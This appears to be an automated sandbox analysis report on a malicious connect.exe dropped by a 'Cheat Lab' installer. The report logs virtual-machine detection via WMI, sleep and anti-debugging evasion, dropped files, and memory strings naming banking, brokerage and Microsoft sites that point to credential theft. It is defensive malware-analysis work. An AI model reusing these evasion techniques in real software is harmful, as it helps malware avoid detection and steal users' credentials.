                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5220Thread sleep count: 6040 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5220Thread sleep count: 2984 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6376Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe TID: 2700Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe TID: 2052Thread sleep count: 65 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe TID: 2052Thread sleep count: 4347 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe TID: 1992Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6040Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2984Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeWindow / User API: threadDelayed 4347Jump to behavior
                    Source: C:\Windows\Installer\MSIC01A.tmpCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_6-33667
                    Source: C:\Windows\Installer\MSIC01A.tmpAPI coverage: 5.9 %
                    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIAEF5.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIAC8E.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIAC5E.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIBE32.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIAD1D.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIACBE.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIBE12.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIAC3E.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIBDB3.tmpJump to dropped file
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIAEC5.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID74E.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_08128DF2 sldt word ptr [eax]22_2_08128DF2
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                    Source: connect.exe, 00000016.00000003.2129392391.00000000081FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
                    Source: connect.exe, 00000016.00000002.2135618138.0000000003A71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002A2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                    Source: connect.exe, 00000016.00000002.2135618138.0000000003A71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                    Source: connect.exe, 00000016.00000002.2135618138.0000000003A71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002A2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                    Source: connect.exe, 00000016.00000002.2135618138.0000000003A71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                    Source: connect.exe, 00000016.00000002.2135618138.0000000003A71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                    Source: connect.exe, 00000016.00000002.2135618138.0000000003A71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                    Source: connect.exe, 00000016.00000002.2135618138.0000000003A71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                    Source: LuaJIT.exe, 00000009.00000002.1936998576.0000022EB34C4000.00000004.00000020.00020000.00000000.sdmp, LuaJIT.exe, 00000009.00000002.1936998576.0000022EB344D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002A2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002A2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002A2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002A2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                    Source: connect.exe, 00000016.00000002.2135618138.0000000003A71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                    Source: connect.exe, 00000016.00000002.2135618138.0000000003A71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                    Source: MSIC01A.tmp, 00000006.00000002.1461201929.00000000013B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                    Source: connect.exe, 00000016.00000002.2135618138.0000000003A71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002A2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                    Source: connect.exe, 00000016.00000002.2135618138.0000000003A71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                    Source: connect.exe, 00000016.00000002.2135618138.0000000003A71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                    Source: connect.exe, 00000016.00000002.2135618138.0000000003A71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                    Source: connect.exe, 00000016.00000002.2135618138.0000000003A71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                    Source: connect.exe, 00000016.00000002.2135618138.0000000003A71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                    Source: connect.exe, 00000016.00000002.2135618138.0000000003A71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                    Source: connect.exe, 00000016.00000002.2135618138.0000000003A71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002A2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002A2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                    Source: connect.exe, 00000016.00000002.2135618138.0000000003A71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                    Source: connect.exe, 00000016.00000002.2135618138.0000000003A71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                    Source: connect.exe, 00000016.00000002.2135618138.0000000003A71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002A2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                    Source: connect.exe, 00000016.00000002.2135618138.0000000003A71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002A2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                    Source: connect.exe, 00000016.00000002.2135618138.0000000003A71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                    Source: connect.exe, 00000016.00000002.2135618138.0000000003A71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002A2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002A2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002A2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002A2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                    Source: connect.exe, 00000016.00000002.2135618138.0000000003A71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002A2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002A2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002A2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                    Source: connect.exe, 00000016.00000002.2135618138.0000000003A71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002A2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002A2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                    Source: connect.exe, 00000016.00000002.2135618138.0000000003A71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002A2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                    Source: connect.exe, 00000016.00000002.2135618138.0000000003A71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                    Source: connect.exe, 00000016.00000002.2135618138.0000000003A71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                    Source: connect.exe, 00000016.00000002.2131742691.00000000004E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: connect.exe, 00000016.00000002.2135618138.0000000003A71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                    Source: connect.exe, 00000016.00000002.2135618138.0000000003A71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002A2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002A2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                    Source: connect.exeBinary or memory string: j/NhscRXP5vyZCubEizzJAyXtsIMrKDuopDcRMMFbv6vBv6z++TpP7ZBgP1ako6UXVMcir1+swte3aZvpyZd+T7mVpjZqlgwRH3Ayl5z1nbXp6eqzQwKdul+SvLGL+tLe/
                    Source: connect.exe, 00000016.00000002.2135618138.0000000003A71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002A2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                    Source: connect.exe, 00000016.00000003.2129392391.00000000081FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareG6O2F5SHWin32_VideoControllerF2C4X_48VideoController120060621000000.000000-00025810337display.infMSBDABGVPVXLPPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemuser-PC1280 x 1024 x 4294967296 colors3ZH1G9L6
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002A2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002A2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002A2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002A2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002A2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002A2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002A2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                    Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: 6_2_00F6AF79 FindFirstFileExW,6_2_00F6AF79
                    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_00408000 VirtualAlloc,LoadLibraryA,GetProcAddress,GetProcAddress,VirtualProtect,lstrlenW,CreateThread,Sleep,WaitForSingleObject,22_2_00408000
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: 6_2_00F62DCC mov ecx, dword ptr fs:[00000030h]6_2_00F62DCC
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: 6_2_00F6AD78 mov eax, dword ptr fs:[00000030h]6_2_00F6AD78
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_00408000 mov edx, dword ptr fs:[00000030h]22_2_00408000
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: 6_2_00F3D0A5 IsDebuggerPresent,OutputDebugStringW,6_2_00F3D0A5
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: 6_2_00F32310 GetProcessHeap,6_2_00F32310
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0815BB18 LdrInitializeThunk,22_2_0815BB18
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeMemory allocated: page read and write | page guardJump to behavior
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: 6_2_00F533A8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00F533A8
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: 6_2_00F5353F SetUnhandledExceptionFilter,6_2_00F5353F
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: 6_2_00F52968 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00F52968
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: 6_2_00F56E1B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00F56E1B
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738ADD9D4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00007FF738ADD9D4
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738ADDBB8 SetUnhandledExceptionFilter,9_2_00007FF738ADDBB8
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738ADD0B0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00007FF738ADD0B0
